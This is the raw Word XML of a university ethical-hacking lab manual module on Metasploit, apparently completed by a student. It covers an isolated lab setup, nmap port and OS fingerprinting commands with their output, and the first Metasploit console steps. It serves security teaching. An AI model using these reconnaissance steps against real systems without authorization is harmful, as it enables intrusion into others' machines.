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left"/>
        <w:tblInd w:w="-115.0" w:type="dxa"/>
        <w:tblBorders>
          <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2316"/>
        <w:gridCol w:w="7260"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2316"/>
            <w:gridCol w:w="7260"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">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0" distT="0" distL="0" distR="0">
                  <wp:extent cx="1304925" cy="657225"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="DLSU CCS black white" id="1" name="image1.jpg"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="DLSU CCS black white" id="0" name="image1.jpg"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId6"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1304925" cy="6572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 La Salle University </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
            <w:pPr>
              <w:pStyle w:val="Heading6"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">College of Computer Studies</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Ethical Hacking Laboratory Manual </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Module No. 5 Part 2 – Exploiting Vulnerabilities Using Metasploit</w:t>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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="9558.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-115.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1305"/>
        <w:gridCol w:w="305"/>
        <w:gridCol w:w="5646"/>
        <w:gridCol w:w="939"/>
        <w:gridCol w:w="283"/>
        <w:gridCol w:w="1080"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1305"/>
            <w:gridCol w:w="305"/>
            <w:gridCol w:w="5646"/>
            <w:gridCol w:w="939"/>
            <w:gridCol w:w="283"/>
            <w:gridCol w:w="1080"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="395" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>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bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Daniel Gavrie Clemente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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0D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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00E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="395" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>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rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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014">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="395" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="bottom"/>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tl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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01A">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1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C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To be able to use the basic hacking concepts of scanning, footprinting, and enumeration on Windows and Linux machines/hosts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To familiarize the student with using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To familiarize the student with using exploits and payloads in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To familiarize the student on CVEs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Setup</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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up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two machines (whether physical or virtual) with the following specification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="pr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3"/>
        <w:tblW w:w="8550.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6"/>
        <w:gridCol w:w="2796"/>
        <w:gridCol w:w="3848"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1906"/>
            <w:gridCol w:w="2796"/>
            <w:gridCol w:w="3848"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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IP Address Settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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Hacker – Linux</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Kali Linux</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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IP Address - 172.16.15.x/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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Victim – Windows</w:t>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Windows XP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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IP Address - 172.16.15.1x/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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Victim – Linux</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Metasploitable Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>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172.16.15.2x/24</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Disable the personal firewalls of the machines.  When working with physical machines, make sure that the network is isolated</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when working with virtual machines, ensure that the network setting of the virtual machines are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host only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isolated from the physical network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logging in to Kali and performing scanning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 the Kali Linux system and set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP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addresses as specified</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 scanning and OS fingerprinting techniques to gather information about the Windows victim computer. Fill in the table below</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="8856.000000000002"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8"/>
        <w:gridCol w:w="3726"/>
        <w:gridCol w:w="2952"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2178"/>
            <w:gridCol w:w="3726"/>
            <w:gridCol w:w="2952"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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Information gathered</w:t>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used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="512" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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TCP ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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25/tcp   open  smtp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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80/tcp   open  http</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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135/tcp  open  msrpc</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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139/tcp  open  netbios-ssn</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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443/tcp  open  https</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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445/tcp  open  microsoft-ds</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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1025/tcp open  NFS-or-IIS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
            <w:pPr>
              <w:widowControl w:val="1"/>
              <w:spacing w:line="24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nmap -sT 172.16.15.15</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Operating system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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MAC Address: 00:E0:4C:05:32:72 (Realtek Semiconductor)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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Device type: general purpose</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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Running: Microsoft Windows XP|2003</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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Distance: 1 hop</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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TCP Sequence Prediction: Difficulty=256 (Good luck!)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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IP ID Sequence Generation: Incremental</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:widowControl w:val="1"/>
              <w:spacing w:line="24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nmap -v -O 172.16.15.15</w:t>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next task is to identify open ports on the victim. Use the appropriate tool and list down </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the 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 ports discovered:</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Hacker machine, open a terminal application and type in “msfconsole” and then press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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nter. There is a considerable amount of time before Metasploit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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ready.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Metasploit search and info command</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command prompt of Metasploit, type in “help search” and then press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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nter.</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some of the keywords that you can search?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="3168.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tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3168"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Keywords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="377" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>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cve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="350" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="350" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>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session_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="350" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>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r>
    </w:tbl>
